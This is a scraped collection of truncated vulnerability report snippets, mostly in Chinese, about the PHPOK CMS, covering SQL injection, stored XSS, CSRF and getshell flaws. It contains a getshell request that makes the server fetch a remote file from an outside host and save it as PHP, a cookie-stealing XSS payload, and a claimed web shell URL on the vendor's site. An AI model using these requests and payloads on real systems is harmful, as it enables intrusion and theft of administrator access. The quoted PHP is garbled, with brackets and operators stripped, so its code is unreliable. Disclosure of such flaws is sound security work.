PHPok v4.1 /framework/www/project/control.php SQL注入漏洞

/framework/www/projectcontrol.php $ext = $this-get"ext"; if$ext && isarray$ext $c = ''; foreach$ext AS $key=$value if$key && $value $c = "ext.".$key." LIKE '%".$value."%'"; $pageurl .= "ext".$key."=".rawurlencode$value."&"; if$c $dt'sqlext' = implode" AND ",$c; $this-assign'ext',$ext;...

PHPok 4.2.024 /framework/engine/session_file.php SQL注入漏洞

No description provided by source...

PHPOK结合CSRF(GET型) - GETSHELL

简要描述： PHPOK 输入过滤做的还是不错的，输入参数都做了 addslashes 转义； addslashes 在某些场景起不到安全防护作用，这里借PHPOK举个栗子。 详细说明： getshell利用的是include方法过滤不严的缺陷，代码如下： 文件 framework/www/paymentcontrol.php ：submit方法 function submitf $rs = $this-authcheck; ... $payment = $this-get'payment','int'; ... // 取数据库表 qingganpayment 的数据 $paymentrs...

phpok最新版一处注入

简要描述： 最近没什么代码审计漏洞 给个前台呗 详细说明： phpok最新版 20141119 问题文件：/framework/model/data.php //还是老问题 //取得文章列表 public function arclist$rs 第102-105行: if$rs'userid' $sql.= "AND l.userid IN".$rs'userid'." "; $rs'userid' 是直接进入查询的造成注入 现在就是找哪个地方应用了 function arclist是从 function arclist过来的 找下arclist 找了下一共2个地方 一个不行 另一个就可...

phpok最新版sql注入（盲注）

简要描述： RT 详细说明： 在framework/www/opencontrol.php中: //网址列表，这里读的是项目的网址列表 function urlf $id = $this-get"id"; if!$id $id = "content"; $this-assign"id",$id; $pid = $this-get"pid"; if$pid $prs = $this-model'project'-getone$pid; $type = $this-get"type"; if!$prs erroropen"项目不存在"; if$type == "cate" &&...

phpok最新版(phpok4.2.024)一处盲注+后台getshell

简要描述： RT 详细说明： 文件/framework/www/postcontrol.php 26-38行 function indexf $id = $this-get"id"; $pid = $this-get'pid'; if!$id && !$pid errorPLang'未指定项目','','error'; $projectrs = $this-call-phpok'project',array"phpok"=$id,'pid'=$pid; if!$projectrs || !$projectrs'module' errorPLang"项目不符合要求",'','error';...

PHPOK最新版前台SQL注入漏洞(可直接获取管理员密码)

简要描述： PHPOK最新版前台某功能存在SQL注入漏洞，可直接UNION注入获取管理员密码 详细说明： PHPOK4.1最新版（2014-08-18更新） 官网：http://www.phpok.com/phpok.html 官网演示站点：http://demo.phpok.com 这里先整理下PHPOK系统的前台数据处理流程: /framework/api/apicontrol.php = /framework/phpokcall.php = /framework/model/data.php PHPOK系统在前台获取“文章总数”的功能实现上存在SQL注入漏洞。...

Phpok漏洞礼包组合可shell

简要描述： Phpok漏洞礼包，组合可shell 详细说明： 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处 我们先来注册一个帐号。 其中帐号这内容为 a';document.write''// 注册好之后。 后台 需要点击才能激活xss 第二处 留言 留言主题...

PHPOK 最新版CSRF getshell

简要描述： 过滤不严格 详细说明： 漏洞细节： 漏洞一：存储型XSS 漏洞文件：framework/api/postcontrol.php94行） $array"title" = $this-get"title"; .... $this-model'list'-save$array,$tid; 这里是保存用户留言内容的部分操作。$array"title" 是获取的客户输入的主题 再来看获取过程中的过滤: （framework/init.php 第829行） //通过post或get取得数据，并格式化成自己需要的 function get$id,$type="safe",$ext=""...

phpok 4.0.556 /data.php SQL注入漏洞

No description provided by source...

phpok存储型xss跨站

简要描述： phpok4.0.556过滤不严格，导致存储型xss跨站产生，利用此漏洞我们可以盗取用户cookie包括管理员 详细说明： 该存储型xss漏洞位于发表评论处， 用户bitcoin在评论过程中插入xss代码 自己浏览触发 管理后台审核的时候，成功触发 漏洞证明： 如上...

phpok存储型xss一枚

简要描述： rt 详细说明： PHPOK4.0.556 漏了评论处的 编码转换。 $content = $this-get"content",'html'; type为 html的话 case 'html':$msg = pregreplace$tmp,'',$msg;break; 只过滤了 $tmp = array"//isU","//isU","//isU","//isU","//isU","//isU","//isU","//isU"; 太弱。 审核评论 alert 可获取 浏览该商品的 用户的cookie 以及后台审核时 管理员的 cookie 漏洞证明：...

phpok4通杀前台getshell 4.0.515官方demo测试成功

简要描述： 无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。 不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题 详细说明： /framework/www/ueditorcontrol.php行61 remoteimagef函数没对远程文件后缀做检查直接保存到本地 这个真心没什么好分析的我就不贴代码分析了 漏洞证明： 构造请求 /index.php?c=ueditor&f=remoteimage&upfile=http://qaz.me/1.txt?.php 我这里1.txt的内容是 测试问题嘛 不做破坏...

phpok前台任意文件上传getshell(官网已shell)

简要描述： 另一个更好用的0day已经没了，把这个也放出来，官网已shell。 详细说明： /framework/www/uploadcontrol.php第45行： None 因为是本地，所以很快就跑出了shell的地址： 访问可见phpinfo： 危害性证明： 官网shell地址，也是我跑出来的，运气比较好，随机数比较小，跑了一分钟就出来了 http://www.phpok.com/res/49d39bf998b3e28e.php...

PHPOK留言板管理XSS（可打管理员）

简要描述： PHPOK留言板管理XSS（打管理员） 详细说明： PHPOK留言板管理XSS（打管理员） 漏洞证明： 测试环境： 当在 在线留言 处留言： 留言成功后需要管理员审核才可以通过，所以不能立刻显示，当管理员登陆后台，删除该留言的时候，触发XSS： 看下源码： 1283. scriptalertdocument.cookie;/script 2014-04-11 evil [email protected] test input type="text" id="sort1283...

PHPOK CSRF获取管理员权限

简要描述： PHPOK CSRF获取管理员权限 详细说明： PHPOK CSRF获取管理员权限 漏洞证明： 测试环境（PHPOK）： 添加用户： 抓包抓到如下内容： None 打开POC页面前： 打开后： 为此添加管理员成功。。。 理论上是通杀所有版本的。。。...

PHPOK V3. 0 local include vulnerability-vulnerability warning-the black bar safety net

PHPOK V3. 0 can be directly included file Vulnerability code: app\www\control\js.php function indexf $act = $this-translib-safe the"act"; iffileexistsROOTJS.$ act.". php" includeROOTJS.$ act.". php"; else echo "ERROR"; exit; Vulnerability testing EXP to:...